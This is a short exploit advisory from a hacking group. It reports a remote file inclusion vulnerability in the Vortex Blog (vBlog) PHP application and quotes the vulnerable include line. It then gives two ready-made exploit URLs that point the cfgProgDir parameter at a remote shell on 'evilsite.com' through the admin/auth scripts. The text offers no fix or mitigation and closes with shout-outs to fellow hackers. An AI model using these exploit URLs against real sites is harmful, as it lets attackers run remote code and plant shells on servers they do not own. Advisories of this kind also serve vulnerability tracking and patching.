Vortex Blog suffers from a remote file inclusion vulnerability.
45115ae5bc26e0aef806dc359046e72fdb32f8590c0c4d9f51f0bb22b79b084a
**********************************************************************************************************
WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
**********************************************************************************************************
* Portal Name :Vortex Blog AKA vBlog
* Class = Remote File Inclusion ;
* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)
--------------------------------------------------------------------------------------------
--------------
- Vulnerable Code
include($cfgProgDir . "session.php");
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
--------------------------------------------------------------------------------------------
--------------
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha
**********************************************************************************************************